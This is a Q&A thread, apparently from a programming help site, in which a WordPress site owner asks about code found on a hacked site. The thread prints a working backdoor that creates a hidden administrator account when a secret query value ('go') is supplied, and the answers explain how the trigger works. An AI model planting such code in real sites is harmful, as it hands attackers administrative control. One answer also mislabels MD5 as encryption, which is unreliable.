# What does this md5( $_GET['path'] ) == '34d1f91fb2e514b8576fab1a75a89a6b' mean found on a functions.php file?

Tags: php, wordpress, security

While finding malicious code in a hacked WordPress site, I have found the following code

```
add_action( 'wp_head', 'my_path' );

function my_path() {
    if ( md5( $_GET['path'] ) == '34d1f91fb2e514b8576fab1a75a89a6b'  ) {
        require( 'wp-includes/registration.php' );
        if ( !username_exists( 'admin2' ) ) {
            $user_id = wp_create_user( 'admin2', 'pass!path' );
            $user = new WP_User( $user_id );
            $user->set_role( 'administrator' ); 
        }
    }
}
```

what does this code do?

```
if ( md5( $_GET['path'] ) == '34d1f91fb2e514b8576fab1a75a89a6b'  )
```

And what does it mean?

```
'34d1f91fb2e514b8576fab1a75a89a6b'
```

Thanks in advance.

Comment: Have a look at https://md5.gromweb.com/?md5=34d1f91fb2e514b8576fab1a75a89a6b

Comment: if `yoururl.tld?path=go` create a new admin account, username admin2.

Comment: If you google `wordpress 34d1f91fb2e514b8576fab1a75a89a6b` you get a few examples on "how to create a wordpress backdoor".

Answer (score 1, accepted):

This

```
if ( md5( $_GET['path'] ) == '34d1f91fb2e514b8576fab1a75a89a6b'  )
```

calculates the MD5 check sum of the string `_GET['path']` and compares it with another string (the hex string). It can be replaced by

```
if ( $_GET['path'] == 'go' )
```

... because the MD5 checksum of `'go'` is `'34d1f91fb2e514b8576fab1a75a89a6b'`.
The semantics only change in 1 point: The original matches other strings with the same MD5 checksum, but the replacement does not.

Answer (score 0):

This will simply covert `$_GET['path']` to md5 which is used for encryption and will compare the encrypted value with `34d1f91fb2e514b8576fab1a75a89a6b` You can get more info here on php site https://www.php.net/manual/en/function.md5.php

Comment: Thanks a lot. Is there any way to know what "34d1f91fb2e514b8576fab1a75a89a6b" actually means.  So that I can find out the code/file that added to my site.

Comment: @BenJonson `echo md5('go')` will output 34d1f91fb2e514b8576fab1a75a89a6b

Answer (score 0):

It checks for whether the query string parameter `path` equals [go](https://md5.gromweb.com/?md5=34d1f91fb2e514b8576fab1a75a89a6b) and creates a user named `admin2`, if it does. The code might boil down to this [old gist on github.com](https://gist.github.com/jgalea/5724566).